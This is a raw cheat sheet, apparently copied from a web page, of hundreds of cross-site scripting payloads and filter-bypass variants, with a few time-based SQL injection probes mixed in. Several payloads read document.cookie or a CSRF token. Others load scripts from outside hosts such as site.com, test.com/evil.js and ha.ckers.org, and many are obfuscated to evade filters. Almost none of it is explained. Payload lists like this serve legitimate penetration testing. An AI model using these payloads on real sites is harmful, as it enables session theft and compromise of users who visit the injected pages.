?/!#/n/?http://www.facebook.com javascript://%0aalert(1)// <iframe><iframe src=”/>”><p <a><img/src=”x”/onerror=”prompt(document.cookie)”> By-pass chrome xss filer: “><svg><script>/<1/>alert(document.cookie)</script></svg> javascript:alert(document.getElementsByTagName(‘meta’)[‘csrf-token’].getAttribute(‘content’)); document.getElementsByName(‘Login’).item(0).src = ‘’ <script xmlns=”http://www.w3.org/1999/xhtml">alert(13)</script> ‘&colon;’ <svg><style>*{font-family:’<svg onload=confirm(1)>’;} ‘%2bbenchmark(10000000%2csha1(1))%2b’ ‘+or+benchmark(0,md5(1))=’ ‘+or+benchmark(10000000,md5(1))=’ BENCHMARK(10000000,SHA1(1)) </script><script>confirm(document.domain)</script> %25%32%37-alert(1337)-%25%32%37 <script>eval(“aler”+(!![]+[])[+[]])(“xss »)</script> <p><img src=\\”#\\” onerror=\\”alert(document.cookie);\\”><strong>test</strong></p> <HTML xmlns: ><audio> <audio src=wp onerror=alert(0X1)> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(/@blinkms/) <svg/onload=alert(1) <img class=”emoji” alt=”??” src=”x” /><svg onload=prompt(document.domain)> javascript://google.com/?%0aalert%28document.cookie%29 <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> <XSS STYLE=”xss:expression(alert(‘XSS’))”> flash based xss (externalInterface.call() ) : “\”));alert(/XSS/)}catch(e){}//” “/alert(/XSS/)/”\”/ “/alert(/XSS/)/” \”/alert(/XSS/);// ‘|alert(‘XSS’)|’ “><i/style=”background:url(javascript:a=\”<scr\”+\”ipt%20src=http://site.com/1.js></script>\")"> “><i/style=”background:url(javascript:document.write(\”<scr\”+\”ipt src=’http://site.com/1.js'></script>\"))"> </a/style=color:expression(alert(‘xss’));%0d> </a/style=color:expression(location.href=’ht’+’tp://google.com’);%0d> <a/href=”file://c:\windows\system32\calc.exe”;%0d>Link</a;%0d> “></a style=”background:url(javascript:alert(‘xss’))”> “></ style=”background:url(javascript:alert(‘xss’))”> “><svg><script>/<@/>alert(1337)</script> ‘<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\’X\S\S\’)\>’ <xpm><script </xpm> alert(61) </script> <![CDATA[<]]>script<![CDATA[>]]>alert(‘xss’)<![CDATA[<]]>/script<![CDATA[>]]> <script type=”text/javascript”>//<![CDATA[var _0x64f5=[“\x63\x6F\x6F\x6B\x69\x65”];alert(document[_0x64f5[0]]);// ]]></script> </SCRIPT>’><script>alert(String.fromCharCode(88,83,83))</SCRIPT> \x61\x6c\x65\x72\x74\x28\x31\x29 \x3Cscript>alert(document.cookie)\x3C/script> \x3Cscript\3Ealert(document.cookie)\x3C/script\3E <script>alert(document.cookie)</script> <div style=”width: expression(alert(/XSS_Jasminder/));”></div> <script <a href=””>atob</a>/,alert(document.domain)</script </td> <svg/onload=location=/javas/.source%2B/cript/.source%2Blocation.hash[2]%2B/al/.source%2B/ert()/.source//#+: ‘” ?</style></scRipt><scRipt>alert(‘Xss by Yassin’)</scRipt> <img src=x onerror=’alert(/xss/)’> “><svg/onload=alert(00)> “]));alert(1)}catch(e){alert(document.location)}// t” onmouseover=alert(/xss/); a=” “!><iframe/src \/\/onload = prompt(“Xssed!”) \/ <svg onload=”alert(3)// ?”onclick=alert(/media:content/)// <svg onload=”alert(3)// “/> <svg/onload=alert(3)// “/> <img src=l onerror=alert(62)// ‘”/><img src=”l” onerror=”alert(/a/)//” “http://www.example.com/exploit509.js < script > alert (1)</ script> data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K# “onmouseenter=”confirm(document.domain) %253Cscript%253Ealert(5)%253C%252Fscript%253E <script>alert(5)</script> “><svg/onload=prompt(3);> <javascript:alert(document.cookie);> “><img src=x onerror=alert(123)> “><div/onmouseover=’prompt(String.fromCharCode(88,83,83))’> %27);alert(document.cookie)// javascript:prompt(1); test”);+alert(String.fromCharCode(88,83,83))// “ onmouseover=prompt(932661) bad=” “ onmouseover=alert(55)> </script><script>alert(/ABOUKIR/)</script> "><img src=x onerror=confirm(1);> ‘>”><script>alert(0);</script> <script>alert(0);</script> <scrIpt>prompt(0);</script> <script/src=”http://test.com/evil.js"> <script>delete alert;alert(1)</script> <svg><script/href=//?? />?—?IE <script src=”https://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1"> </script <svg><script/href= /> <script>confirm(0);</script> <iframe src=”javascript:alert(63) » <form><isindex formaction=”javascript&colon;confirm(1)> <embed/code=//goo.gl/nlX0P? <embed/src=//goo.gl/nlX0P> <object/data=//goo.gl/nlX0P> <isindex action=//goo.gl/nlX0P type=image> <form action=//goo.gl/nlX0P><input type=”submit”> <meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”> <applet code=”javascript:confirm(document.cookie);”> <iframe/src=”data:text/html,<iframe/src=http://jsfiddle.net/d7Xu7/1/>"> <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) <iframe/src=”javascript:alert(document.cookie)”http://jsfiddle.net/d7Xu7/1/>"> type=image> <isindex x=”javascript:” onmouseover=”alert(1)”> “><p id=”\u0070rompt(1)”onmouseover=\u0065val(id) // “><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%> <img/src=”x”/onerror=”prom\u0070t('XSS')”> <q oncut=\u0070rompt(64)> “><p id=””onmouseover=\u0070rompt(1) // <a%20x%20href=javascript%26%2358%3Bprompt(1)>a</a> ‘;alert(String.fromCharCode(88,83,83))//\’; alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//\”; alert(String.fromCharCode(88,83,83))// ?</SCRIPT>”>’><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT> */(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())’%3E%3C%%20style=’x:expression/* 1) <a href=”javascript&colon;\u0061l&#101%72t(1)”><button> 2) <div onmouseover=’alert(1)’>DIV</div> 3) <iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”> c 4) <a href=”jAvAsCrIpT&colon;alert(1)”>X</a> 7) <var onmouseover=”prompt(1)”>On Mouse Over</var>? 8) <a href=javascript&colon;alert(document&period;cookie)>Click Here</a> 9) <img src=”/” =_=” title=”onerror=’prompt(1)’”> 10) <%<!?—?‘%><script>alert(1);</script ? 11) <script src=”data:text/javascript,alert(1)”></script> 12) <iframe/src \/\/onload = prompt(1) 13) <iframe/onreadystatechange=alert(1) 15) <input value=<><iframe/src=javascript:confirm(1) <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover=”alert(‘xxs’)”> <IMG SRC= onmouseover=”alert(‘xxs’)”> <IMG onmouseover=”alert(‘xxs’)”> <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <video> <source onerror=”javascript:alert(1)”> <video onerror=”javascript:alert(1)”><source> <audio onerror=”javascript:alert(1)”><source> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <button form=test onformchange=alert(65)>X <form><button formaction=”javascript:alert(1)”> <svg><x><script>alert(1&#41</x> <svg><x><script>alert('1'&#41</x> <svg onload=window.onerror=alert;throw/12/;//« /> <img src=x onerror=while(true){prompt(13)}> <iframe src=””/srcdoc=’<svg onload=alert(14)>’> <!?—?<img src=” ?<img src=x onerror=alert(1)//”> <svg id=javascript:alert(1) onload=location=id> <svg id=alert(1) onload=eval(id)> <img src=x:alert(alt) onerror=eval(src) alt=xwx> <body/onpageshow=(alert)(1)> <svg id=alert(1) onload=eval(id)> <svg onload=(alert)(1) > <frameset onload=alert(1)> <picture><source srcset=”x”><img onerror=”alert(1)”></picture> <picture><img srcset=”x” onerror=”alert(1)”></picture> <img srcset=”,,,,,x” onerror=”alert(1)”> /*To bypass input values*/ “autofocus/onfocus=”alert &#40/1&#41 onfocus=onfocus=\u0061lert(1) autofocus autofocus onfocus=window.onerror=alert;throw/1/;// /*Bypass filtration “script/alert”*/ <script>$=1,alert($)</script> <script ~~~>confirm(1)</script ~~~> <script>$=1,\u0061lert($)</script> <</script/script><script>eval(‘\\u’+’0061'+’lert(1)’)//</script> <</script/script><script ~~~>\u0061lert(1)</script ~~~> </style></scRipt><scRipt>alert(1)</scRipt> /*tougher policy on the html tags*/ <h1 onmouseover=alert(1)>xwx <h1/onmouseover=’\u0061lert(1)’>xwx <marquee/onstart=alert(1)>xwx <div/onmouseover=’alert(1)’>xwx <h1/onmouseover=’alert(1)’>xwx<applet code=”javascript:confirm(document.cookie);”> <h1 onmouseover=’alert(1)’>xwx <p onmouseover=’alert(1)’>xwx <p/onmouseover=’alert(1)’>xwx /*Classic very popular vector*/ <script>alert(1)</script> </script><img src=x onerror=alert(1);> </script><iframe/onload=alert(1)> <img src=x onerror=alert(1);> <style ONLOAD=prompt(1)> <iframe/onload=alert(1)> <svg/onload=prompt(1)> <svg onload=alert(1)> “style=background:black; onmouseover=alert(1)” “autofocus/onfocus=”alert(1) “onmouseover=”alert(1);” “/onmouseover= alert(1)> “onload=”alert(1)”” /*HTML5 popular vectors*/ <video/poster/onerror=alert(1)> <video><source onerror=”javascript:alert(1)”> <video onerror=”javascript:alert(1)”><source> <audio onerror=”javascript:alert(1)”><source> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <form><button formaction=”javascript:alert(1)”> /*data:text*/ data:text/plain,alert(‘xwx’) data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== /*Bonus Dom Based Xss wector for popular WordPress plugin Prettyphoto*/ #!prettyPhoto/2,<a onclick=”alert(1);”>/ /*firefox*/ #prettyPhoto[gallery]/1,<a onclick=”alert(1);”>/ /*firefox*/ #prettyPhoto[rmsg0d]/2,<img src=x onerror=alert(1)>/ /*firefox*/ #prettyphoto[pp_gal]/2,<img src=1 onerror=alert(1)> /*Only Google chrome*/ <input onfocus=write(1) autofocus> <input onblur=write(1) autofocus><input autofocus> <video poster=javascript:alert(1)//></video> <body onscroll=alert(1)><br><br><br><br><br><br>…<br><br><br><br><input autofocus> <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alerte(66)>X</button> <video><source onerror=”alert(1)”> <video onerror=”alert(1)”><source></source></video> <form><button formaction=”javascript:alert(1)”>X</button> <body oninput=alert(1)><input autofocus> <math href=”javascript:alert(1)”>CLICKME</math> <math> <!?—?up to FF 13 ? <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:alert(67) »>CLICKME</maction> <!?—?FF 14+ ? <maction actiontype=”statusline” xlink:href=”javascript:alert(3)”>CLICKME<mtext>http://http://google.com</mtext></maction> </math> <link rel=”import” href=”http://yassineaboukir.com/xss.svg" /> <iframe srcdoc=”<img src=x:x onerror=alert(1)>” /> picture><source srcset=”x”><img onerror=”alert(1)”></picture> <picture><img srcset=”x” onerror=”alert(1)”></picture> <img srcset=”,,,,,x” onerror=”alert(1)”> <iframe srcdoc=”<svg onload=alert(1)&nvgt;”></iframe> <a href=”javascript:'<svg onload=alert(1)&nvgt;'”>CLICK</a> —?—?Vectors working on HTML4 and older versions — <frameset onload=alert(1)> <table background=”javascript:alert(1)”></table> <!?—?<img src=” ?<img src=x onerror=alert(1)//”> <comment><img src=”</comment><img src=x onerror=alert(1)//”> <!?—?up to Opera 11.52, FF 3.6.28 ? <![><img src=”]><img src=x onerror=alert(1)//”> <!?—?IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ ? <svg><![CDATA[><image xlink:href=”]]><img src=xx:x onerror=alert(68(69))//« ></svg> <style><img src=”</style><img src=x onerror=alert(1)//”> <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div> <head><base href=”javascript://”/></head><body><a href=”/. /,alert(1)//#”>XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT> <OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT> <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object> <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></embed> <b <script>alert(1)//</script>0</script></b> <div id=”div1"><input value=”``onmouseover=alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script> <!?—?IE 6–8 ? <x ‘=”foo”><x foo=’><img src=x onerror=alert(1)//’> <!?—?IE 6–9 ? <! ‘=”foo”><x foo=’><img src=x onerror=alert(69)//’> <? ‘=”foo”><x foo=’><img src=x onerror=alert(3)//’> <embed src=”javascript:alert(1)”></embed> // O10.10?, OM10.0?, GC6?, FF <img src=”javascript:alert(70)”> <image src=”javascript:alert(71)”> // IE6, O10.10?, OM10.0? <script src=”javascript:alert(3)”></script> // IE6, O11.01?, OM10.1? <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div> <object allowscriptaccess=”always” data=”test.swf”></object> class XSS {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”); }} [A] <? foo=”><script>alert(1)</script>”> <! foo=”><script>alert(1)</script>”> </ foo=”><script>alert(1)</script>”> [B] <? foo=”><x foo=’?><script>alert(1)</script>’>”> [C] <! foo=”[[[x]]”><x foo=”]foo><script>alert(1)</script>”> [D] <% foo><x foo=”%><script>alert(1)</script>”> <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe> <html> <body> <b>some content without two new line \n\n</b> Content-Type: multipart/related; boundary=”******”<b>some content without two new line</b>?—?****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg?—?****** — </body> </html> <!?—?IE 5–9 ? <div id=d><x xmlns=”><iframe onload=alert(1)”></div> <script>d.innerHTML+=’’;</script> <!?—?IE 10 in IE5–9 Standards mode ? <div id=d><x xmlns=’”><iframe onload=alert(72)//’></div> <script>d.innerHTML+=’’;</script> <img[a][b]src=x[d]onerror[c]=[e]”alert(1)”> <a href=”[a]java[b]script[c]:alert(1)”>XXX</a> <img src=”x` `<script>alert(1)</script>”` `> <img src onerror /” ‘”= alt=alert(1)//”> <title onpropertychange=alert(1)></title><title title=></title> <!?—?IE 5–8 standards mode ? <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=xx:x onerror=alert(1)></a>”> <!?—?IE 5–9 standards mode ? <!a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(73)//”> <?a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(3)//”> <!?—?[if]><script>alert(1)</script ? <!?—?[if<img src=x onerror=alert(74)//]> ? <script src=”/\example.com\foo.js”></script> // Safari 5.0, Chrome 9, 10 <script src=”\\example.com\foo.js”></script> // Safari 5.0 <object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object> <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object> <!?—?`<img/src=xx:xx onerror=alert(1)//?—?!> <xmp> <% </xmp> <img alt=’%></xmp><img src=xx:x onerror=alert(1)//’> <script> x=’<%’ </script> %>/ alert(75) </script> XXX <style> *[‘<!?—?‘]{} </style> ?{} *{color:red}</style> <a style=”-o-link:’javascript:alert(1)’;-o-link-source:current”>X</a> <a style=”-o-link:’javascript:alert(1)’;-o-link-source:current”>X</a> <style>@import “data:,*%7bx:expression(write(1))%7D”;</style> <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d <a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”alert(1);”>XXX</a></a><a href=”javascript:alert(76)”>XXX</a> <style>*[{}@import’test.css?]{color: green;}</style>X * {-o-link:’javascript:alert(1)’;-o-link-source: current;} <div style=”font-family:’foo[a];color:red;’;”>XXX</div> <div style=”font-family:foo}color=red;”>XXX</div> <div style=”[a]color[b]:[c]red”>XXX</div> <div style=”\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;”>XXX</div> <// style=x:expression\28write(1)\29> <style>*{x:expression(write(1))}</style> <div style=”list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div> <div id=d><div style=”font-family:’sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B’”>X</div></div> <script>with(document.getElementById(“d”))innerHTML=innerHTML</script> <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script> <script>({0:#0=alert/#0#/#0#(0)})</script> <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script> <script>history.pushState(0,0,’/i/am/somewhere_else’);</script> <script src=”#”>{alert(1)}</script>;1 <b><script<b></b><alert(1)</script </b></b> <script<{alert(1)}/></script </> 0?<script>Worker(“#”).onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’)) <script>crypto.generateCRMFRequest(‘CN=0’,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script> <script>[{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]</script> <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(1)”></g></svg> <svg xmlns=”http://www.w3.org/2000/svg"><script>alert(1)</script></svg> <svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg"></svg> <svg xmlns=”http://www.w3.org/2000/svg"> <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/></a> </svg> <svg xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink"> <animation xlink:href=”javascript:alert(1)”/> <animation xlink:href=”data:text/xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/> <image xlink:href=”data:image/svg+xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/> <foreignObject xlink:href=”javascript:alert(1)”/> <foreignObject xlink:href=”data:text/xml,%3Cscript xmlns=’http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/> </svg> <svg xmlns=”http://www.w3.org/2000/svg"> <handler xmlns:ev=”http://www.w3.org/2001/xml-events" ev:event=”load”>alert(1)</handler> </svg> <svg><style><img/src=x onerror=alert(1)// </b> <svg xmlns=”http://www.w3.org/2000/svg"> <set attributeName=”onmouseover” to=”alert(1)”/> <animate attributeName=”onunload” to=”alert(1)”/> </svg> <svg><script> alert&DiacriticalGrave;1&DiacriticalGrave; <p> <svg><script> alert&grave;1&grave; <p> <doc xmlns:xlink=”http://www.w3.org/1999/xlink" xmlns:html=”http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href=”javascript:alert(1)” xlink:type=”simple”>XXX</x> </doc> <x xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:actuate=”onLoad” xlink:href=”javascript:alert(1)” xlink:type=”simple”/> <meta charset=”x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset=”x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset=”x-mac-farsi”>¼script ¾alert(1)//¼/script ¾